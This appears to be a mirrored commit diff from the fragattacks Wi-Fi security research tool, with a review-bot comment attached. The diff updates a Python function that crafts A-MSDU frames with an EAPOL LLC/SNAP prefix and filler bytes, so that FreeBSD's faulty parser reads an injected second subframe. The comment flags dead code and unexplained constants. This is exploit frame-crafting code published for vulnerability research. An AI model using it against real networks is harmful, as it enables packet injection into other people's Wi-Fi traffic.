mirror of
https://github.com/vanhoefm/fragattacks.git
synced 2024-11-25 00:38:24 -05:00
fragattacks: updated freebsd_create_eapolmsdu
This commit is contained in:
parent
9e068ad969
commit
75b8ea9c54
@ -39,25 +39,27 @@ def log_level2switch(options):
|
|||||||
elif options.debug >= 1: return ["-d", "-K"]
|
elif options.debug >= 1: return ["-d", "-K"]
|
||||||
return ["-K"]
|
return ["-K"]
|
||||||
|
|
||||||
def freebsd_create_eapolmsdu(src, dst, payload):
|
def freebsd_create_eapolmsdu(src, dst, toinject):
|
||||||
"""
|
"""
|
||||||
FreeBSD doesn't properly parse EAPOL/MSDU frames for some reason.
|
FreeBSD doesn't properly parse A-MSDU frames that start with an
|
||||||
It's unclear why. But this code puts the length and addresses at
|
LLC/SNAP header. This is problematic when performing the EAPOL/AMSDU
|
||||||
the right positions so FreeBSD will parse the A-MSDU frame
|
attack. Details why this happens are unclear. To better understand
|
||||||
successfully, so that we can even attack bad implementations.
|
how the frames are parsed, see docs/freebsd_amsdu_bug.odt
|
||||||
"""
|
"""
|
||||||
|
|
||||||
# EAPOL and source address. I don't think the value "\x00\06" is important
|
# Subframe 1: LLC/SNAP for EAPOL. The X's will be part of the first subframe.
|
||||||
rawmac = bytes.fromhex(src.replace(':', ''))
|
rawmac = bytes.fromhex(src.replace(':', ''))
|
||||||
prefix = raw(LLC()/SNAP()/EAPOL()) + b"\x00\x06" + rawmac
|
prefix = raw(LLC()/SNAP()/EAPOL()) + b"XXXXXXXX"
|
||||||
|
|
||||||
# Length followed by the payload
|
# Subframe 1: content will be the X's (excluding the first 6 bytes). The actual
|
||||||
payload = create_msdu_subframe(src, dst, payload)
|
# ethernet payload length will be payload_len - 16 due to parsing bugs.
|
||||||
payload = prefix + struct.pack(">I", len(payload)) + raw(payload)
|
payload_len = 17
|
||||||
|
total_len = payload_len + 6 + 6 + 2
|
||||||
|
padding_len = 4 - (total_len % 4) if total_len % 4 != 0 else 0
|
||||||
|
payload = prefix + struct.pack(">H", payload_len) + payload_len * b"X" + padding_len * b"Y"
|
||||||
|
|
||||||
# Put the destination MAC address in the "right" place
|
# Subframe 2: we can now append it normally
|
||||||
rawmac = bytes.fromhex(dst.replace(':', ''))
|
payload += raw(create_msdu_subframe(src, dst, toinject))
|
||||||
payload = payload[:16] + rawmac[:4] + payload[20:]
|
|
||||||
|
|
||||||
return payload
|
return payload
|
||||||
|
|
||||||
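Review bot: The new body leaves `rawmac = bytes.fromhex(src.replace(':', ''))` as dead code: the rewritten `prefix = raw(LLC()/SNAP()/EAPOL()) + b"XXXXXXXX"` no longer reads it, so `src` now only matters for the second subframe. Either delete the line or, if the eight filler bytes are meant to stay address-like, use it on purpose; an unused decode next to the `prefix` invites a future "fix" that reintroduces the address and breaks the FreeBSD-specific layout. The constants are also bare: `payload_len = 17` and `total_len = payload_len + 6 + 6 + 2` should say what they stand for, e.g. `# A-MSDU subframe header: DA(6) + SA(6) + length(2); padded to a 4-byte boundary` and a note that 17 was chosen so that FreeBSD's buggy parser lands on the second subframe (the docstring points to docs/freebsd_amsdu_bug.odt but the code itself gives no hint). As a minor style point, `padding_len = (-total_len) % 4` expresses the same alignment without the conditional.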
|